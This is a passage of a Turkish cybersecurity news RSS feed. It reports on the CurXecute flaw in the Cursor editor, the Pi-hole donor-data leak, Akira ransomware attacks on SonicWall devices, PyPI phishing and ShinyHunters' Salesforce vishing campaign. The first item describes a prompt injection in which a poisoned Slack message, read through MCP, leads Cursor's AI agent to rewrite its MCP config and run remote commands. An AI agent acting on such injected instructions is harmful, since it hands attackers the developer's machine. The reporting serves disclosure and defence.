                                            <![CDATA[<h2 style="color: #1e40af; font-weight: bold; font-size: 28px; margin-bottom: 24px;">Yapay Zekâ Destekli Cursor Kod Editöründe Kritik Güvenlik Açığı: CurXecute (CVE-2025-54135)</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Yapay zekâ destekli kod editörü <strong>Cursor</strong>'da tespit edilen yeni bir güvenlik açığı, sistemde geliştirici ayrıcalıklarıyla <em>uzaktan komut çalıştırılmasına</em> olanak tanıyor. Araştırma şirketi <strong>Aim Security</strong> tarafından "CurXecute" adı verilen bu zafiyet, <strong>CVE-2025-54135</strong> olarak kayda geçti.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Cursor IDE, <em>Model Context Protocol (MCP)</em> adlı açık standart sayesinde yapay zekâ ajanlarının harici kaynaklarla bağlantı kurup işlevsel olmasını sağlıyor. Ancak MCP yapısı, ajanın kontrol akışının kötü niyetli girdilerle manipüle edilmesine zemin hazırlıyor.</p>
<h3 style="color: #1e40af; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Zararlı Prompt Dosyası Yazdırabiliyor</h3>
<p style="font-size: 17px; margin-bottom: 20px;">CurXecute açığından faydalanan saldırganlar, ajana dış kaynaktan gönderilen zararlı komut dizileriyle <code>~/.cursor/mcp.json</code> dosyasını yeniden yazabiliyor. Kullanıcının bilgisi olmadan bu dosya diske kaydediliyor ve böylece uzaktan komut çalıştırma mümkün hale geliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Aim Security’ye göre dosya değişiklikleri kullanıcı tarafından reddedilse bile etkisi sürüyor; bu da kullanıcı etkileşimi olmadan saldırıların başarıyla yürütülebilmesine sebep oluyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Örneğin, MCP destekli Slack sunucularına zararlı bir prompt yerleştirilip, geliştiricinin bu mesajları özetlemesi için ajan kullanılması halinde kötü amaçlı betikler çalıştırılabiliyor.</p>
<blockquote style="background: #e0e7ff; border-left: 5px solid #1e40af; padding: 12px 18px; font-style: italic; color: #1e40af; margin: 24px 0;">“Zehirli tek bir belge, yerel yapay zekâ ajanını sistem kabuğuna dönüştürebilir.” — Aim Security</blockquote>
<h3 style="color: #1e40af; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Yama ve Tavsiyeler</h3>
<p style="font-size: 17px; margin-bottom: 20px;">CurXecute açığı 7 Temmuz 2025’te Cursor geliştirici ekibine bildirildi, ertesi gün yazılım ana dalına yama eklendi. 29 Temmuz’da yayımlanan <strong>Cursor 1.3</strong> sürümü bu açığı kapatan güncellemeleri içeriyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Cursor ekibi, <strong>CVE-2025-54135</strong> için yayınladığı güvenlik danışma metninde, kullanıcıların mümkün olan en kısa sürede güncellemeye geçmelerini ve eski sürümleri kullanmamalarını öneriyor. Açık, 8.6 skorla “orta seviye kritik” olarak derecelendirildi.</p>
<p style="font-size: 17px;">Araştırmacılar, bu açığın fidye yazılım saldırıları, veri sızıntıları, yapay zekâ bazlı yanlış yönlendirmeler (hallusinasyonlar) ve proje bütünlüğünü tehdit eden sızıntı tabanlı saldırılara yol açabileceği konusunda uyarıda bulunuyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Pi-hole, bağışçılara ait verilerin ifşa olduğu veri ihlalini doğruladı: WordPress eklentisi kaynaklı açık</title>
            <link>https://cumha.com.tr/pi-hole-bagiscilara-ait-verilerin-ifsa-oldugu-veri-ihlalini-dogruladi-wordpress-eklentisi-kaynakli-acik</link>
            <guid>https://cumha.com.tr/pi-hole-bagiscilara-ait-verilerin-ifsa-oldugu-veri-ihlalini-dogruladi-wordpress-eklentisi-kaynakli-acik</guid>
            <description><![CDATA[ Ağ düzeyinde reklam engelleme aracı Pi-hole, web sitesindeki bağış formunda kullanılan GiveWP WordPress eklentisindeki bir güvenlik açığı nedeniyle yaklaşık 30 bin bağışçının isim ve e-posta bilgilerinin sızdırıldığını açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689116bb049ae.webp" length="45568" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Pi-hole veri ihlali nasıl gerçekleşti, hangi bilgiler sızdırıldı, GiveWP güvenlik açığı ne kadar sürede kapatıldı, Pi-hole yazılımı olaydan etkilendi mi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #d32f2f; font-weight: bold; font-size: 28px; margin-bottom: 25px;">Pi-hole: GiveWP Bağış Eklentisi Güvenlik Açığıyla 30 Bin Kullanıcı Verisi Sızdırıldı</h2>
<p style="font-size: 17px; margin-bottom: 22px;">Popüler reklam engelleme çözümü <strong>Pi-hole</strong>, WordPress bağış eklentisi <strong>GiveWP</strong>’de tespit edilen kritik bir güvenlik açığı nedeniyle kullanıcı verilerinin sızdırıldığını duyurdu.</p>
<p style="font-size: 17px; margin-bottom: 22px;">Kuruluş, <strong>28 Temmuz Pazartesi</strong> günü bağışçılardan gelen şüpheli e-posta bildirimleri üzerine durumu fark etti. Yapılan teknik inceleme, GiveWP eklentisinin bir açığından dolayı bağış yapan kullanıcıların isim ve e-posta adreslerinin, herhangi bir kimlik doğrulama olmaksızın sayfanın kaynak kodunu görüntüleyen herkes tarafından erişilebilir olduğunu ortaya koydu.</p>
<p style="font-size: 17px; margin-bottom: 22px;">Veri ihlali yalnızca bağış formu üzerinden destek veren kullanıcıları etkilerken, Pi-hole’un kendi yazılımı bu olaydan etkilenmedi.</p>
<h3 style="color: #d32f2f; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Yaklaşık 30 Bin Bağışçı Etkilendi</h3>
<p style="font-size: 17px; margin-bottom: 22px;">1 Ağustos Cuma yayımlanan analizde, veri ihlali bildirim servisi <em>Have I Been Pwned</em> yaklaşık 30 bin bağışçının etkilendiğini belirtti. Sızan kayıtların %73’ü, daha önce başka ihlallerde de ifşa olmuş kullanıcı bilgilerini içeriyor.</p>
<p style="font-size: 17px; margin-bottom: 22px;">Pi-hole, finansal bilgilerin <strong>Stripe</strong> ve <strong>PayPal</strong> tarafından işlendiğini, bu nedenle kredi kartı veya ödeme detaylarının sızdırılmadığını vurguladı.</p>
<p style="font-size: 17px; margin-bottom: 22px;">Bağış formunda kullanıcıların geçerli isim veya e-posta girmesi zorunlu olmasa da, tüm bağışçı bilgilerine internet üzerinden erişilebilmesinden dolayı Pi-hole özür diledi.</p>
<h3 style="color: #d32f2f; font-weight: 600; font-size: 22px; margin-bottom: 18px;">Gecikmeli Bilgilendirme ve Eleştiriler</h3>
<p style="font-size: 17px; margin-bottom: 22px;">GiveWP geliştirici ekibi, açığı GitHub’da rapor edilmesinden birkaç saat sonra gidererek <strong>4.6.1</strong> sürümünü yayımladı. Ancak Pi-hole, geliştiricinin kullanıcı bilgilendirmede geciktiğini ve olayın ciddiyetini yeterince önemsemediğini savundu.</p>
<p style="font-size: 17px;">Pi-hole açıklamasında, “Kullandığımız yazılımların sorumluluğu bize aittir. Yaygın kullanılan bir eklentiye güven duyduk ve bu güven boşa çıktı. Etkilenen tüm bağışçılardan özür dileriz.” ifadesi yer aldı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SonicWall güvenlik duvarları Akira fidye yazılımı saldırılarının hedefinde: Yeni bir güvenlik açığı mı kullanılıyor</title>
            <link>https://cumha.com.tr/sonicwall-guvenlik-duvarlari-akira-fidye-yazilimi-saldirilarinin-hedefinde-yeni-bir-guvenlik-acigi-mi-kullaniliyor</link>
            <guid>https://cumha.com.tr/sonicwall-guvenlik-duvarlari-akira-fidye-yazilimi-saldirilarinin-hedefinde-yeni-bir-guvenlik-acigi-mi-kullaniliyor</guid>
            <description><![CDATA[ Siber güvenlik firması Arctic Wolf, Temmuz ortasından bu yana SonicWall SSL VPN cihazlarına yönelik Akira fidye yazılımı saldırılarında artış yaşandığını bildirdi. Henüz doğrulanmamış olsa da, saldırıların bilinmeyen bir sıfırıncı gün açığı üzerinden gerçekleştiği düşünülüyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689116cd8cd3d.webp" length="46890" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 20:59:34 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Akira grubu hangi yöntemle SonicWall cihazlarına sızıyor, sıfırıncı gün açığı kullanılıyor mu, yöneticiler hangi acil önlemleri almalı, SMA 100 cihazlarında hangi riskler öne çıkıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #1a73e8; font-weight: bold; font-size: 28px; margin-bottom: 25px;">Arctic Wolf Uyardı: SonicWall Cihazları Akira Fidye Yazılımı Saldırılarıyla Hedefte</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Siber güvenlik şirketi <strong>Arctic Wolf</strong>'un açıklamasına göre, Temmuz ayının ikinci yarısından itibaren SonicWall güvenlik duvarı cihazları <em>Akira</em> fidye yazılımı saldırılarında hedef alınmaya başladı. Saldırganların, henüz doğrulanmamış olmakla birlikte, daha önce bilinmeyen bir güvenlik açığını kullanıyor olabileceği değerlendiriliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;"><strong>Akira fidye yazılımı</strong> Mart 2023'te ortaya çıktı ve kısa sürede dünya genelinde çok sayıda sektörü hedef aldı. Bugüne kadar 300’den fazla kurumu karanlık ağ sızıntı portalına ekleyen grup; Nissan, Hitachi ve Stanford Üniversitesi gibi yüksek profilli kuruluşlara yönelik saldırılarla dikkat çekti. FBI verilerine göre, Akira grubu Nisan 2024 itibarıyla 250'den fazla kurbanından toplamda 42 milyon doların üzerinde fidye topladı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Arctic Wolf Labs araştırmacıları, saldırıların çoğunun SonicWall SSL VPN bağlantıları üzerinden yetkisiz erişim yoluyla gerçekleştiğini, ilk sızmanın 15 Temmuz'da gözlendiğini açıkladı. Henüz erişim yöntemi kesinleşmemekle birlikte, bir sıfırıncı gün açığı olasılığı güçlü şekilde değerlendiriliyor. Ancak brute force, sözlük saldırıları veya kimlik bilgisi dolandırıcılığı gibi yöntemlerin de tamamen dışlanmadığı belirtildi.</p>
<h3 style="color: #1a73e8; font-weight: 600; font-size: 22px; margin-bottom: 16px;">Uzun Süreli ve Hedefli Kampanya</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırganlar, VPN üzerinden sağlanan ağ erişimini çok kısa sürede veri şifreleme aşamasına taşıyor. Bu durum, Ekim 2024’ten bu yana tespit edilen benzer saldırı örüntüleriyle örtüşüyor ve SonicWall cihazlarına yönelik süregelen ve organize bir kampanyaya işaret ediyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">VPN bağlantılarında genellikle geniş bant internet servis sağlayıcıları kullanılırken, bu saldırılarda sanal özel sunucu (VPS) tabanlı VPN kimlik doğrulama hizmetlerinin tercih edildiği tespit edildi. Bu detay, saldırıların sistematik biçimde yürütüldüğünü ortaya koyuyor.</p>
<h3 style="color: #1a73e8; font-weight: 600; font-size: 22px; margin-bottom: 16px;">Arctic Wolf’un Tavsiyeleri ve Güvenlik Önlemleri</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Arctic Wolf, SonicWall cihazlarında potansiyel bir sıfırıncı gün açığının aktif olarak istismar ediliyor olabileceği ihtimaline karşı, yöneticilere SSL VPN hizmetlerini geçici olarak devre dışı bırakmalarını tavsiye etti. Ayrıca detaylı günlük kaydı alma, uç nokta izleme ve VPS tabanlı VPN oturumlarının engellenmesi gibi ek güvenlik önlemlerinin devreye alınması gerektiği bildirildi.</p>
<h3 style="color: #1a73e8; font-weight: 600; font-size: 22px; margin-bottom: 16px;">SMA 100 Cihazları İçin Güncelleme Uyarısı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırılara ilişkin Arctic Wolf raporu, SonicWall’un müşterilerini SMA 100 cihazlarındaki kritik bir güvenlik açığı (<strong>CVE-2025-40599</strong>) hakkında uyarmasından bir hafta sonra yayımlandı. SonicWall, söz konusu açığın kötüye kullanılabilmesi için yönetici ayrıcalığı gerektiğini ve şu anda aktif bir sömürü izine rastlanmadığını belirtti. Ancak yine de tüm kullanıcıların sistemlerini güncellemeleri istendi.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Google Threat Intelligence Group (GTIG) tarafından yayımlanan bir başka raporda, saldırganların yetkisiz erişim elde ettikten sonra <strong>OVERSTEP</strong> adlı yeni bir rootkit zararlı yazılım yüklediği belirtildi.</p>
<p style="font-size: 17px;">SonicWall, sanal veya fiziksel SMA 100 cihazı kullanan tüm müşterilere, GTIG tarafından paylaşılan bulgu göstergeleri (IoC) doğrultusunda sistem günlüklerini incelemeleri ve şüpheli faaliyet durumunda destek ekipleriyle irtibata geçmeleri çağrısında bulundu.</p>
<p style="font-size: 17px; margin-top: 16px; font-style: italic; color: #555;">Not: SonicWall tarafından konuya ilişkin henüz resmi bir açıklama yapılmamıştır.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Python geliştiricileri sahte PyPI sitesi üzerinden kimlik avı saldırılarıyla hedef alınıyor</title>
            <link>https://cumha.com.tr/python-gelistiricileri-sahte-pypi-sitesi-uzerinden-kimlik-avi-saldirilariyla-hedef-aliniyor</link>
            <guid>https://cumha.com.tr/python-gelistiricileri-sahte-pypi-sitesi-uzerinden-kimlik-avi-saldirilariyla-hedef-aliniyor</guid>
            <description><![CDATA[ Python Software Foundation, PyPI kullanıcılarını sahte bir site üzerinden yapılan kimlik avı saldırılarına karşı uyardı. &quot;pypj.org&quot; alan adına sahip sahte sitede kullanıcı adı ve parola toplayan saldırganların amacı, geliştiricilerin yüklediği paketleri kötü amaçlı yazılımlarla değiştirmek ya da yeni zararlı paketler yüklemek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891196631121.webp" length="19614" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:45:12 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>sahte PyPI sitesine nasıl yönlendiriliyor, geliştirici hesapları nasıl ele geçiriliyor, zararlı Python paketleri nasıl yükleniyor, PyPI kullanıcıları ne yapmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #2a5db0; font-weight: bold; font-size: 28px; margin-bottom: 24px;">PyPI Topluluğu Kimlik Avı Saldırısına Karşı Uyarıldı: Sahte "Email Verification" E-postalarına Dikkat</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Python topluluğunun resmi paket deposu olan <strong>PyPI (Python Package Index)</strong>, bu hafta kullanıcılarını sahte bir web sitesi üzerinden yürütülen kimlik avı saldırısına karşı uyardı. Saldırganlar, PyPI geliştiricilerine <em>"[PyPI] Email verification"</em> başlıklı ve <strong>noreply@pypj.org</strong> adresinden gönderilen e-postalarla ulaşıyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">PyPI yöneticisi Mike Fiedler tarafından yapılan açıklamada, “Bu durum PyPI platformunun güvenliğini ihlal eden bir saldırı değil, kullanıcı güvenini istismar eden bir kimlik avı girişimidir. Kullanıcılardan e-postalarını doğrulamaları isteniyor ve sahte bir siteye yönlendiriliyorlar.” ifadeleri kullanıldı.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Söz konusu sahte site, resmi PyPI platformuna görsel olarak benzeyecek şekilde tasarlanmış ve kullanıcıları oturum açmaya yönlendiriyor. Ancak bu giriş bilgilerinin gerçek PyPI’ye iletilmesi yerine saldırganlar tarafından toplandığı belirtiliyor.</p>
<h3 style="color: #2a5db0; font-weight: 600; font-size: 22px; margin-bottom: 16px;">Hedef: Hesap Ele Geçirme ve Zararlı Paket Yükleme</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırganların amacı, geliştiricilere ait PyPI hesaplarını ele geçirerek daha önce yayımlanmış Python paketlerine kötü amaçlı kod enjekte etmek veya yeni zararlı paketler yüklemek. Bu tür saldırılar, açık kaynak yazılım ekosisteminde geniş çaplı güvenlik tehditlerine yol açabiliyor.</p>
<h3 style="color: #2a5db0; font-weight: 600; font-size: 22px; margin-bottom: 16px;">PyPI Platformu Önlem Aldı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">PyPI yöneticileri, sitenin ana sayfasına bir uyarı bandı ekleyerek kullanıcıları aktif olarak bilgilendirmeye başladı. Ayrıca, alan adı sağlayıcıları ve CDN firmalarına marka ihlali ve kötüye kullanım bildirimleri gönderildiği belirtildi.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Kullanıcılardan şu önlemleri almaları istendi:</p>
<ul style="font-size: 16px; padding-left: 22px; margin-bottom: 24px; color: #333;">
<li><strong>noreply@pypj.org</strong> adresinden gelen e-postalara tıklamadan silinmesi,</li>
<li>Daha önce bu sahte sitede kullanıcı bilgisi girildiyse, şifrelerinin derhal değiştirilmesi,</li>
<li>Hesaplarının Security History bölümü üzerinden şüpheli etkinliklerin kontrol edilmesi.</li>
</ul>
<h3 style="color: #2a5db0; font-weight: 600; font-size: 22px; margin-bottom: 16px;">Daha Önce de Saldırılar Yaşanmıştı</h3>
<p style="font-size: 17px;">Python Software Foundation, geçtiğimiz yıl yüzlerce zararlı paketin yüklenmesiyle sonuçlanan bir kampanya nedeniyle geçici olarak yeni kullanıcı kaydı ve proje oluşturma işlemlerini durdurmak zorunda kalmıştı. Ayrıca Şubat 2025’te başlatılan Project Archival sistemiyle, artık güncelleme almayacak projelerin arşivlenmesi kolaylaştırılmıştı.</p>
<p style="font-size: 17px; margin-top: 16px;">Uzmanlar, açık kaynak topluluklarında yer alan geliştiricilerin e-posta adreslerini içeren meta verilerinin saldırganlar için değerli bir kaynak olduğunu ve bu verilerin kimlik avı kampanyalarında kullanılabileceğini hatırlatıyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ShinyHunters, Qantas ve Allianz dahil çok sayıda şirketin verilerini Salesforce üzerinden hedef aldı</title>
            <link>https://cumha.com.tr/shinyhunters-qantas-ve-allianz-dahil-cok-sayida-sirketin-verilerini-salesforce-uzerinden-hedef-aldi</link>
            <guid>https://cumha.com.tr/shinyhunters-qantas-ve-allianz-dahil-cok-sayida-sirketin-verilerini-salesforce-uzerinden-hedef-aldi</guid>
            <description><![CDATA[ ShinyHunters isimli siber suç grubu, Qantas, Allianz Life, LVMH ve Adidas gibi firmalara yönelik saldırılarda Salesforce sistemlerini hedef aldı. Saldırılar, telefonla sosyal mühendislik yoluyla bağlantılı uygulamalar aracılığıyla veri erişimi sağlayan kimlik avı kampanyalarıyla gerçekleştirildi. Şirketlerden veri çalındığı doğrulandı, ancak henüz kamuya açık bir sızıntı yaşanmadı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891191e5c3a7.webp" length="79218" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:44:30 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ShinyHunters saldırısında hangi yöntemler kullanıldı, hangi şirketler etkilendi, saldırılar Salesforce açıklarını mı hedef alıyor, sosyal mühendisliğe karşı hangi güvenlik önlemleri alınmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-weight: bold; font-size: 28px; color: #004aad; margin-bottom: 24px;">ShinyHunters Siber Suç Grubu, Önde Gelen Şirketlere Salesforce CRM Saldırıları Düzenliyor</h2>
<p style="font-size: 17px; margin-bottom: 18px;">Siber güvenlik kaynaklarına göre, <strong>ShinyHunters</strong> olarak bilinen siber suç grubu, <strong>Qantas, Allianz Life, LVMH</strong> ve <strong>Adidas</strong> gibi önde gelen firmaları hedef alan geniş kapsamlı veri hırsızlığı saldırılarının arkasında yer alıyor. Söz konusu saldırılar, şirketlerin kullandığı Salesforce CRM platformlarına yönelik sosyal mühendislik yöntemleriyle gerçekleştirildi.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Google’ın Tehdit İstihbarat Grubu (GTIG), Haziran 2025'te bu tür saldırıların arttığını ve saldırganların <em>UNC6040</em> olarak izlendiğini bildirmişti. Bu kapsamda, saldırganlar BT destek personeli gibi davranarak kurbanları telefonla aradı ve onları Salesforce'un bağlı uygulama kurulumu sayfasına yönlendirdi. Kullanıcılardan sahte "bağlantı kodları" girilmesi istendi. Böylece, kötü amaçlı olarak kurgulanmış Data Loader uygulaması kurbanın hesabına bağlanabildi.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Bazı saldırılarda, bu uygulama “My Ticket Portal” adıyla yeniden adlandırılarak daha inandırıcı hale getirildi. Kimlik avı sürecinde ayrıca sahte Okta giriş sayfaları da kullanılarak kullanıcıların kimlik bilgileri ve çok faktörlü kimlik doğrulama (MFA) token'ları da ele geçirildi.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #004aad; margin-bottom: 18px;">Hedef Olan Şirketler</h3>
<ul style="font-size: 16px; padding-left: 22px; margin-bottom: 24px; color: #333;">
<li>LVMH bünyesindeki Louis Vuitton, Dior ve Tiffany &amp; Co., müşteri veritabanlarına yetkisiz erişim sağlandığını doğruladı.</li>
<li>Allianz Life, 16 Temmuz 2025’te üçüncü taraf bir bulut tabanlı CRM sistemi üzerinden erişim sağlandığını açıkladı.</li>
<li>Qantas, olayın Salesforce ile ilgili olduğunu doğrulamazken, yerel medya verilerin Salesforce sistemi üzerinden çalındığını bildirdi.</li>
<li>Adidas da benzer bir CRM saldırısından etkilendiğini duyurdu.</li>
</ul>
<p style="font-size: 17px; margin-bottom: 18px;">Adli belgeler, saldırıların özellikle Salesforce’un "Accounts" ve "Contacts" tablolarına odaklandığını ortaya koyuyor. Tüm saldırılar aynı kampanyaya işaret ederken, şirketlere gönderilen özel e-postalarda kendilerini "ShinyHunters" olarak tanıtan tehdit aktörlerinin şirketleri özel olarak şantaj yoluyla hedef aldığı belirtildi.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #004aad; margin-bottom: 18px;">Grup Yapısı ve Saldırı Yöntemleri</h3>
<p style="font-size: 17px; margin-bottom: 18px;">ShinyHunters grubu, daha önce Snowflake veri sızıntısı, AT&amp;T, Oracle Cloud, PowerSchool gibi büyük ölçekli olaylarla gündeme gelmişti. Grup, genellikle şirket ağlarına tam erişim sağlamak yerine veri çalımı ve özel şantaj yöntemlerine odaklanıyor.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Bazı güvenlik araştırmacıları, ShinyHunters’ın zaman zaman <em>Scattered Spider</em> olarak bilinen ve daha agresif yöntemler kullanan başka bir grupla örtüşen üyelik yapısına sahip olduğunu düşünüyor. Her iki grubun da <em>Lapsus$</em> adlı eski hacker kolektifiyle bağlantılı olabileceği iddia ediliyor.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Ayrıca, ShinyHunters’ın bazı durumlarda doğrudan saldırıyı gerçekleştirmeyip, üçüncü tarafların çaldığı verileri komisyon karşılığında pazarlayan bir “extortion-as-a-service” (şantaj hizmeti) grubu olarak faaliyet gösterdiği de öne sürülüyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #004aad; margin-bottom: 18px;">Salesforce: Platform Değil, Kullanıcılar Hedef Alınıyor</h3>
<p style="font-size: 17px; margin-bottom: 18px;">Salesforce, yapılan açıklamada sistemlerinde herhangi bir zafiyet olmadığını ve saldırıların tamamen kullanıcılara yönelik sosyal mühendislik yöntemleriyle gerçekleştiğini belirtti.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Şirket, kullanıcıların aşağıdaki güvenlik önlemlerini uygulamasını öneriyor:</p>
<ul style="font-size: 16px; padding-left: 22px; margin-bottom: 12px; color: #333;">
<li>Güvenilen IP aralıklarını zorunlu hale getirme</li>
<li>En az yetki ilkesine uygun yetkilendirme</li>
<li>Çok faktörlü kimlik doğrulama (MFA) kullanımı</li>
<li>Bağlı uygulamalara erişimi sınırlandırma</li>
<li>Salesforce Shield ile gelişmiş izleme ve olay politikaları kullanımı</li>
<li>Güvenlik olayları için belirli bir güvenlik iletişim kişisi tanımlama</li>
</ul>
<p style="font-size: 17px;"></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Proton, Windows ve mobil cihazlar için ücretsiz ve açık kaynaklı 2FA uygulaması yayımladı</title>
            <link>https://cumha.com.tr/proton-windows-ve-mobil-cihazlar-icin-ucretsiz-ve-acik-kaynakli-2fa-uygulamasi-yayimladi</link>
            <guid>https://cumha.com.tr/proton-windows-ve-mobil-cihazlar-icin-ucretsiz-ve-acik-kaynakli-2fa-uygulamasi-yayimladi</guid>
            <description><![CDATA[ Proton, kullanıcıların çevrimdışı olarak tek kullanımlık doğrulama kodları oluşturmasını sağlayan Proton Authenticator adlı yeni iki faktörlü kimlik doğrulama (2FA) uygulamasını tanıttı. Windows, macOS, Linux, Android ve iOS için sunulan uygulama reklamsız, takipçisiz ve tamamen açık kaynaklı olarak dikkat çekiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689118ef6321d.webp" length="26750" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:43:19 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Proton Authenticator nasıl çalışıyor, uygulama hangi cihazları destekliyor, TOTP kodları neden daha güvenli, 2FA için açık kaynak alternatifleri neler sunuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-weight: bold; font-size: 30px; color: #0052cc; margin-bottom: 24px;">Proton, Yeni Proton Authenticator Uygulamasını Yayınladı</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Gizlilik odaklı hizmetleriyle tanınan İsviçre merkezli teknoloji şirketi <strong>Proton</strong>, yeni <strong>Proton Authenticator</strong> uygulamasını yayımladığını duyurdu. Uygulama, Windows, macOS, Linux, Android ve iOS platformlarında çalışıyor ve tamamen ücretsiz olarak indirilebiliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Proton Authenticator, çevrimdışı çalışan ve her 30 saniyede bir yenilenen zaman tabanlı tek kullanımlık şifreler (TOTP) üreterek kullanıcıların çevrimiçi hesaplarını daha güvenli hale getiriyor. Bu kodlar, parolaların yanı sıra ikinci bir doğrulama katmanı olarak kullanılıyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Uygulama, reklam içermiyor, kullanıcı takibi yapmıyor ve Proton hesabı gerektirmeden kullanılabiliyor. Bu yönüyle Google Authenticator, Microsoft Authenticator ve Authy gibi yaygın uygulamalardan ayrılıyor. Proton yetkilileri, “Bu uygulama, gizlilik, şeffaflık ve kullanıcı odaklı güvenlik ilkeleriyle geliştirildi” açıklamasında bulundu.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0052cc; margin-bottom: 16px;">Proton Authenticator’ın Öne Çıkan Özellikleri</h3>
<ul style="font-size: 16px; padding-left: 20px; margin-bottom: 24px; color: #333; line-height: 1.5;">
<li>Tamamen çevrimdışı çalışabilen zaman tabanlı doğrulama kodları,</li>
<li>Uçtan uca şifreli çoklu cihaz senkronizasyonu,</li>
<li>Diğer platformlara geçişi kolaylaştıran içe/dışa aktarma özelliği,</li>
<li>Biyometrik ya da PIN ile uygulama kilitleme,</li>
<li>Otomatik şifreli yedekleme sistemi,</li>
<li>Kullanıcı verilerinin hiçbir Proton sunucusuna gönderilmemesi,</li>
<li>Yakında yayımlanması planlanan açık kaynak kod yapısı.</li>
</ul>
<p style="font-size: 17px; margin-bottom: 20px;">Ayrıca Proton Authenticator, pek çok popüler uygulamada olmayan bir özellikle geliyor: TOTP anahtarlarının dışa aktarılabilmesi, yani kullanıcıların tüm hesaplarını başka bir cihaza veya uygulamaya taşırken veri kaybı yaşamaması mümkün hale geliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Bu tür uygulamalar, SMS veya e-posta üzerinden gönderilen doğrulama kodlarına göre çok daha güvenli kabul ediliyor. Çünkü kodlar yerel olarak üretiliyor, kısa sürede geçersiz hale geliyor ve phishing, SIM değişimi veya ortadaki adam (MITM) saldırılarına karşı dayanıklı bir yapı sunuyor.</p>
<p style="font-size: 17px;">Proton, bu yeni uygulamasıyla kullanıcıları büyük teknoloji şirketlerinin kapalı ve takip temelli ekosistemlerinden kurtarmayı hedeflediğini belirtti. Kaynak kodunun önümüzdeki haftalarda Proton’un GitHub hesabında yayımlanması bekleniyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni güvenlik açıklarının yüzde 80’inden önce ağda anormal hareketlilik gözleniyor</title>
            <link>https://cumha.com.tr/yeni-guvenlik-aciklarinin-yuzde-80inden-oence-agda-anormal-hareketlilik-goezleniyor</link>
            <guid>https://cumha.com.tr/yeni-guvenlik-aciklarinin-yuzde-80inden-oence-agda-anormal-hareketlilik-goezleniyor</guid>
            <description><![CDATA[ GreyNoise tarafından yayımlanan araştırma, güvenlik açıkları (CVE) kamuoyuna açıklanmadan önce geçen haftalarda ağ taramaları, brute-force saldırıları ve keşif faaliyetlerinde belirgin artış yaşandığını ortaya koydu. Bu davranışsal örüntü, saldırganların yeni açıklar ortaya çıkmadan önce hazırlık yaptığını gösteriyor. ]]></description>

